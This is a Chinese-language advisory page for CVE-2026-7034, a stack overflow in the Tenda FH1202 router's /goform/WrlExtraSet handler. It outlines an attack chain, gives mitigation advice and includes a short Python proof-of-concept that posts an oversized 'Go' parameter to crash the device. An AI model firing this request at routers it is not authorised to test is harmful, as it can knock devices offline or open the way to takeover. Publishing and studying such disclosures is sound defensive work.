CVE-2026-7034 CVSS 8.8 高危

CVE-2026-7034 Tenda FH1202栈溢出漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7034

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda FH1202

漏洞概述

Tenda FH1202路由器在1.2.0.14(408)版本的httpd组件中发现严重漏洞。攻击者可通过网络远程操纵/goform/WrlExtraSet接口中的Go参数，引发栈缓冲区溢出，从而可能导致设备崩溃或远程代码执行。

技术细节

该漏洞源于Tenda FH1202 httpd服务中的WrlExtraSet函数对Go参数处理不当。函数在接收用户输入时未进行足够的长度校验，直接将数据拷贝到栈缓冲区。攻击者构造超长字符串作为Go参数发送至/goform/WrlExtraSet，可覆盖返回地址，控制执行流。由于漏洞利用无需用户交互且仅需低权限，攻击者可轻易获取系统控制权，造成机密性、完整性及可用性的全面破坏。

攻击链分析

STEP 1

侦察

扫描网络识别Tenda FH1202设备及其固件版本。

STEP 2

漏洞利用

向目标设备/goform/WrlExtraSet端点发送包含恶意构造的Go参数的HTTP POST请求。

STEP 3

代码执行

触发栈溢出，覆盖返回地址，执行恶意代码或导致设备拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/goform/WrlExtraSet"
    # Payload to trigger stack overflow
    # Exact offset depends on specific firmware analysis
    payload = {
        "Go": "A" * 1000  
    }
    
    try:
        response = requests.post(url, data=payload)
        print(f"Status Code: {response.status_code}")
        if response.status_code == 200 or response.status_code == 500:
            print("Vulnerability likely triggered.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit("192.168.0.1")

影响范围

Tenda FH1202 1.2.0.14(408)

防御指南

临时缓解措施

建议用户立即检查设备固件版本并应用官方补丁。在未修复前，请务必关闭路由器的远程管理功能，仅允许受信任的内网IP访问管理界面，并关注异常流量以防范潜在攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7034
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7034
3 Details https://www.cvedetails.com/cve/CVE-2026-7034/
4 VulDB https://vuldb.com/cve/CVE-2026-7034
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/FH1202/vul_19/README.md
6 Link https://vuldb.com/submit/798476
7 Link https://vuldb.com/vuln/359614
8 Link https://vuldb.com/vuln/359614/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表